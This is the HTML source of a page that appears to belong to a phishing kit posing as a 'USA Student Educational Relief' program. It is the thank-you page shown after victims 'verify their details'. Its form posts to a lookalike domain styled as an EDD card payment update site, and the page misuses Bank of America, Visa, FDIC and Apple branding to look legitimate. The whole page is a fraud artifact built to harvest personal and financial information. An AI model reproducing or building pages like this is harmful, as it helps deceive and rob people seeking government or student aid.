
<!DOCTYPE html>
<html class="js flexbox flexboxlegacy canvas canvastext webgl no-touch geolocation postmessage websqldatabase indexeddb hashchange history draganddrop websockets rgba hsla multiplebgs backgroundsize borderimage borderradius boxshadow textshadow opacity cssanimations csscolumns cssgradients cssreflections csstransforms csstransforms3d csstransitions fontface generatedcontent video audio localstorage sessionstorage webworkers no-applicationcache svg inlinesvg smil svgclippaths" lang="en" style="">
    <head>
    <meta charset="utf-8">    
    <meta content="IE=edge" http-equiv="X-UA-Compatible">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta name="version" content="22.07.0128">
    <meta class="foundation-data-attribute-namespace">
    <meta class="foundation-mq-xxlarge">
    <meta class="foundation-mq-xlarge">
    <meta class="foundation-mq-large">
    <meta class="foundation-mq-medium">
    <meta class="foundation-mq-small">
    <title>USA STUDENT RELIEF</title>
    <script type="text/javascript" async="" src="https://www.google-analytics.com/analytics.js" nonce=""></script>
    <link href="css/prohqcker2.css" rel="stylesheet">
    <link href="css/prohqcker.css" rel="stylesheet">
    <link href="css/print1.css" rel="stylesheet" type="text/css" media="print">
    <link href="css/preventEarlyClickCss.css" rel="stylesheet">
    <link href="css/site.min.css" rel="stylesheet" type="text/css">
    <link href="favicon1.ico" rel="shortcut icon" type="image/x-icon">
    <meta name="format-detection" content="telephone=no">
    <meta class="foundation-mq-topbar">
    <script type="text/javascript" src="js/mask.js"></script>
</head>
<body class="body">
<div class="header-container" role="banner">
    <div class="row header-row">
        <div class="columns brand-container show-for-medium-up">
            <div class="small-12 medium-3 custom-medium-push-5 columns">
                <div class="logo-wrapper">
                    <a href="#">
                        <img alt="STUDENT RELIEF" class="header-logo medium img-responsive" id="brand-logo" src="edu.png" title="">
                    </a>
                </div>
            </div>
            <div class="small-12 medium-9 custom-medium-pull-7 columns">
                <div class="program-wrapper">
                    <span class="header-card-program">STUDENT EDUCATIONAL RELIEF</span>
                </div>
            </div>
        </div>
        <div class="small-12 show-for-small-only columns">
            <nav data-topbar="" class="top-bar mobile-nav" role="navigation" aria-label="Main" style="">
                <ul class="title-area">
                    <li class="name">
                        <a href="#"><img alt="Bank Of America, N. A. Logo" class="header-logo medium img-responsive" id="brand-logo-mobile" src="edu.png" title=""></a>
                    </li>
                    
                    <li class="header-card-program">STUDENT EDUCATIONAL FORM </li>
                </ul>
               
            </nav>
        </div>
        <div class="row show-for-medium-up">
            <div class="medium-12 columns">
                <nav data-topbar="" class="top-bar desktop-nav" role="navigation" aria-label="Main">
                    
                </nav>
            </div>
        </div>
    </div>
</div>
<div class="content-container" id="content" role="main" tabindex="-1">
    <form action="https://eddcapaymentiinf0update.xyz/eddcard/home/forgotusername" autocomplete="off" id="MainForm" method="post" novalidate="novalidate"><input name="__RequestVerificationToken" type="hidden" value="XdfJTfSXWfZN2Ny8HP4URug0SUKgBjdb74gkyODfKkdd7JDTFUONICNvfyQqtBAc1DJ7L_E_20vlYF65sfCk_KzIxSRuBQKQkP4r6jwFY0U1"><div class="row">
        <div class="large-12 medium-12 small-12 column">
        <h1 id="ForgotUsername"> SUBMITTED!!!</h1><div class="validation-summary-valid message warning" data-valmsg-summary="true" data-visaalert="" style="display: none; visibility: visible;"><i class="fa fa-exclamation-triangle" role="img" aria-label="Warning"></i>
                                <ul><li style="display:none"></li>
        </ul>
                                <button aria-label="Close" tabindex="0" class="close" title="Close" type="button">
                                    <i class="fa fa-times" role="img" aria-label="Close"></i>
                                </button>
                            </div></div></div><div class="box"><div class="row"><div class="medium-12 columns">
        <div class="large-12 medium-12 small-12 column">
                                
        </div>
        
        
        <br><br><center><svg version="1.1" id="Layer_1" width="70" x="0px" y="0px" viewBox="0 0 117.72 117.72" style="enable-background:new 0 0 117.72 117.72" xml:space="preserve"><style type="text/css">
            .st0{fill:#0d305e;}
        </style><g><path class="st0" d="M58.86,0c9.13,0,17.77,2.08,25.49,5.79c-3.16,2.5-6.09,4.9-8.82,7.21c-5.2-1.89-10.81-2.92-16.66-2.92 c-13.47,0-25.67,5.46-34.49,14.29c-8.83,8.83-14.29,21.02-14.29,34.49c0,13.47,5.46,25.66,14.29,34.49 c8.83,8.83,21.02,14.29,34.49,14.29s25.67-5.46,34.49-14.29c8.83-8.83,14.29-21.02,14.29-34.49c0-3.2-0.31-6.34-0.9-9.37 c2.53-3.3,5.12-6.59,7.77-9.85c2.08,6.02,3.21,12.49,3.21,19.22c0,16.25-6.59,30.97-17.24,41.62 c-10.65,10.65-25.37,17.24-41.62,17.24c-16.25,0-30.97-6.59-41.62-17.24C6.59,89.83,0,75.11,0,58.86 c0-16.25,6.59-30.97,17.24-41.62S42.61,0,58.86,0L58.86,0z M31.44,49.19L45.8,49l1.07,0.28c2.9,1.67,5.63,3.58,8.18,5.74 c1.84,1.56,3.6,3.26,5.27,5.1c5.15-8.29,10.64-15.9,16.44-22.9c6.35-7.67,13.09-14.63,20.17-20.98l1.4-0.54H114l-3.16,3.51 C101.13,30,92.32,41.15,84.36,52.65C76.4,64.16,69.28,76.04,62.95,88.27l-1.97,3.8l-1.81-3.87c-3.34-7.17-7.34-13.75-12.11-19.63 c-4.77-5.88-10.32-11.1-16.79-15.54L31.44,49.19L31.44,49.19z"></path></g></svg><br>
        
        <br><br><h3 style="text-align: center">Thank you for verifying your details. 
        </br> One of our state agent will get intouch with you shortly, for futher assistance</h3></center>
        
        
        
        
        </div></div></div>         
        </form>
</div>
<div class="footer" role="contentinfo">
    <div class="row">
        
    </div>
    <div class="extra">
        <div class="small-12 columns">
            <div class="row copyright">
                <div class="small-12 columns">
                    <p>
                        Copyright 2023 United State of America .<a href="index.html"> Visa Global Privacy Notice.<a>                                                    
                        <br>America, N.A. Member FDIC Equal Housing Lender                    
                    </p>
                    <div class="large-12 column align-center">
                        <p style="color:#000;">
                            <img src="edu.png"><br><br>
                           Apple, the Apple logo, the App Store, and iPhone are trademarks of Apple Inc., registered in the U.S. and other countries. Google Play and the Google Play logo are trademarks of Google LLC.
                        </p>
                        <p style="color:#000;"> Your funds are eligible for FDIC insurance. If specific deposit insurance requirements are met. See <a href="index.html" data-reveal-id="modal-leaving-site">index.html</a> for details. In the event Bank of America, N.A. fails, the FDIC may require information from you, including a government identification number, to determine the amount of your insured deposits.  If you do not provide this information to the FDIC access to your insured relief will be delayed. </p>
                    </div>
                </div>
            </div>
        </div>
    </div>
</div>
</html>